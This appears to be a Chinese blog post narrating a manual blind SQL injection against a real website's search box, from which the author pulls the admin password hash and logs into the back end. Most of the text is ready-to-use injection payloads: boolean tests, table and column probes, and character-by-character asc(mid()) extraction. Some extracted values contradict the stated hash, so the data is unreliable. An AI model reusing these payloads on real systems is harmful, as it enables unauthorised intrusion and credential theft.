首先判断注入点,在查询关键字那里输入:4%' and 1=1 and '%' =' 返回正常,没报错,
然后输入:4%' and 1=2 and '%' =' 报错了,说明这个地方是存在注入点的。
这个是post的方式的,抓包之后,本来打算用工具来跑的,试了一下,没检测出来,我就用手工来慢慢检测吧。
我没有马上查表名,而是去看了看后台,直接在域名后面加上admin成功爆出后台,找到后台后看了一下这个后台的源文件。
好了,我们先来查询一下表名吧,在搜索框里输入:%'and(select count(*)from admin)>0 and '%'=' 返回正常,说明这个admin表存在。
我再来查看一下字段吧,从刚才查看那个后台的源文件得知有psw这个字段,查询字段:
4%'and(select top 1 len(psw)from admin) and '%'=' 返回正常。
现在重点来了,我们查一下它里面的内容吧
4%'and(select top 1 asc(mid(psw,1,1))from admin)>54 and '%'='
4%'and(select top 1 asc(mid(psw,2,1))from admin)>49 and '%'='
4%'and(select top 1 asc(mid(psw,3,1))from admin)>54 and '%'='
4%'and(select top 1 asc(mid(psw,4,1))from admin)>96 and '%'='
4%'and(select top 1 asc(mid(psw,5,1))from admin)>100 and '%'='
4%'and(select top 1 asc(mid(psw,6,1))from admin)>98 and '%'='
4%'and(select top 1 asc(mid(psw,7,1))from admin)>48 and '%'='
4%'and(select top 1 asc(mid(psw,8,1))from admin)>97 and '%'='
4%'and(select top 1 asc(mid(psw,9,1))from admin)>96 and '%'='
4%'and(select top 1 asc(mid(psw,10,1))from admin)>53 and '%'='
4%'and(select top 1 asc(mid(psw,11,1))from admin)>99 and '%'='
4%'and(select top 1 asc(mid(psw,12,1))from admin)>55 and '%'='
4%'and(select top 1 asc(mid(psw,13,1))from admin)>100 and '%'='
4%'and(select top 1 asc(mid(psw,14,1))from admin)>49 and '%'='
4%'and(select top 1 asc(mid(psw,15,1))from admin)>51 and '%'='
4%'and(select top 1 asc(mid(psw,16,1))from admin)>56 and '%'='
手工注入就是麻烦,通过我慢慢的检测,成功爆出了相应的值:
55 50 55 97 101 99 49 98 97 54 96 56 101 50 52 57
用转换工具转换了一下得出:727aec1ba6d8e249 (md5值)
解密之后就是:101010
我试了一下用户名admin果然正确,登录后台。
482
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
